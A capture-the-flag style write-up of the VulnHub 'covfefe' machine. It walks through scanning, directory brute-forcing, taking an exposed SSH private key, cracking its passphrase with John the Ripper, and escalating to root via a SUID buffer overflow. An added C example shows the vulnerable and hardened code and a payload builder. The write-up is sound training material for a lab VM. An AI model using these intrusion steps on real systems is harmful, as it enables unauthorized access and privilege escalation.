In this article we are going to solve another boot2root challenge, covfefe. It is a beginner/intermediate level machine, and we can download it from VulnHub.
The first step is to locate the target on the local network; for that we used the command: netdiscover -i wlan0
Now, using the command nmap -A 192.168.43.237, we check which ports are open and what is running on them.
We decided to browse the HTTP service on port 80 first, and found the default nginx welcome page.
We checked the page source but couldn't find anything useful, so we moved on to port 31337, where the web server only returned an error message.
So we decided to brute-force directories on both port 80 and port 31337 with dirb.
Port 80 gave no results, so we ran the same scan against port 31337.
Okay, so this time we have a good number of useful directories; we will explore them one by one.
Content of /robots.txt:
Now we open the /taxes directory.
We have found our first flag! Now it's time to explore the other directories as well. The .ssh directory looks especially useful, because it may contain a public and private key pair that we can use to log in over SSH.
That is good news for us, so we download all three files (authorized_keys, id_rsa and id_rsa.pub) to our machine.
Reading the files, we finally found a username in authorized_keys: the trailing comment on the public key names the user it belongs to.
Now we have a username plus the private and public keys, so without wasting time we tried to connect over SSH with: ssh -i id_rsa <username>@192.168.43.237 (using the username taken from authorized_keys).
The first attempt failed: SSH refuses to use a private key whose file permissions are too open, so we restricted the permissions on both files (id_rsa and id_rsa.pub)
with the commands chmod 400 id_rsa and chmod 400 id_rsa.pub.
Then we tried the same ssh command again. This time it asked for a passphrase, which means the id_rsa file is encrypted. So we decided to use ssh2john.py to recover the passphrase.
This script can be found in /usr/share/john/ssh2john.py. It converts the key into a hash format John can work on; we used the command: /usr/share/john/ssh2john.py /root/Downloads/id_rsa > crack_it
Now we use John the Ripper on crack_it (for example john --wordlist=<wordlist> crack_it) to crack the passphrase.
With the recovered passphrase we tried SSH once more, and this time we succeeded!
Now it's time for privilege escalation. We started by looking for SUID binaries (e.g. find / -perm -4000 -type f 2>/dev/null) and found one named read_message.
Executing this binary prompts us to enter a name, and we get a warning if we enter the wrong one.
We changed directory to /root, where we found two files: the flag and the C source code for the read_message binary.
Reading the C code gave us the key facts: the name the binary expects is Simon, and the buffer that receives the name is only 20 bytes. That immediately suggests a buffer overflow. So we ran the binary again and supplied more than 20 characters: the name Simon, padding up to the 20-byte limit, and then /bin/sh. The extra bytes overflow the name buffer, the SUID binary ended up executing /bin/sh, and yes, we got a root shell!
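The write-up does not reproduce read_message.c, so the following is an added example, not the VM's source: a hypothetical program with the shape described above, where a 20-byte name buffer sits directly in front of the buffer that holds the command the program later executes, beside a hardened version and the payload builder. The command path /usr/local/sbin/message, the struct layout, the function names and the detail that the name check compares only the first five bytes (without some prefix-style compare a padded "Simon" could not pass the check and overflow at the same time) are all assumptions made for the illustration. system() is never actually called, so the example is safe to compile and run anywhere.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the VM's read_message.c. The name and program regions
 * live in one flat array so their adjacency is guaranteed here; in a real
 * binary the compiler picks the stack layout, so the distance between the
 * two buffers must be confirmed (for example in gdb) before relying on it. */
#define NAME_LEN    20
#define PROGRAM_LEN 64
#define MESSAGE_CMD "/usr/local/sbin/message"   /* assumed path, hypothetical */

struct frame {
    char mem[NAME_LEN + PROGRAM_LEN];  /* [0,20) = name, [20,84) = program */
};

static char *name_of(struct frame *f)    { return f->mem; }
static char *program_of(struct frame *f) { return f->mem + NAME_LEN; }

/* Emulates gets(): copies until the terminating NUL with no length check,
 * so a long input runs straight into whatever follows the name buffer. */
static void unsafe_read(char *dst, const char *input) {
    while ((*dst++ = *input++) != '\0') { }
}

/* Vulnerable version. Returns the command that would be handed to system(),
 * or NULL when the name check fails (the "warning" branch from the write-up). */
const char *read_message_vulnerable(struct frame *f, const char *input) {
    memset(f->mem, 0, sizeof f->mem);
    strcpy(program_of(f), MESSAGE_CMD);      /* set before the name is read */
    unsafe_read(name_of(f), input);          /* overflow happens here */
    /* Assumed weakness: only the first five bytes are compared, so
     * "Simon" followed by anything still passes. */
    if (strncmp(name_of(f), "Simon", 5) != 0)
        return NULL;
    return program_of(f);                    /* real binary: system(program) */
}

/* Hardened version: bounded read and an exact comparison of the whole name. */
const char *read_message_hardened(struct frame *f, const char *input) {
    memset(f->mem, 0, sizeof f->mem);
    strcpy(program_of(f), MESSAGE_CMD);
    if (strlen(input) >= NAME_LEN)           /* reject anything that would not fit with its NUL */
        return NULL;
    memcpy(name_of(f), input, strlen(input) + 1);
    if (strcmp(name_of(f), "Simon") != 0)
        return NULL;
    return program_of(f);
}

/* Builds the payload described in the write-up: "Simon", filler up to exactly
 * 20 bytes, then the command that lands at program[0]. Returns its length. */
size_t build_payload(char *out, size_t outsz) {
    const char *cmd = "/bin/sh";
    size_t len = NAME_LEN + strlen(cmd);
    if (outsz < len + 1)
        return 0;
    memcpy(out, "Simon", 5);
    memset(out + 5, 'A', NAME_LEN - 5);
    strcpy(out + NAME_LEN, cmd);
    return len;                              /* 27 bytes */
}

int main(void) {
    struct frame f;
    char payload[64];
    build_payload(payload, sizeof payload);
    printf("vulnerable would run: %s\n", read_message_vulnerable(&f, payload));
    const char *h = read_message_hardened(&f, payload);
    printf("hardened would run:   %s\n", h ? h : "(input rejected)");
    return 0;
}
```

The payload is 27 bytes: the first 20 fill the name buffer, and the 8 bytes of "/bin/sh" plus its NUL overwrite the start of the adjacent command string, which is why the privileged binary runs a shell instead of the intended message program. The hardened variant closes both holes at once: a length check before the copy removes the overflow, and strcmp on the full string removes the prefix-only match.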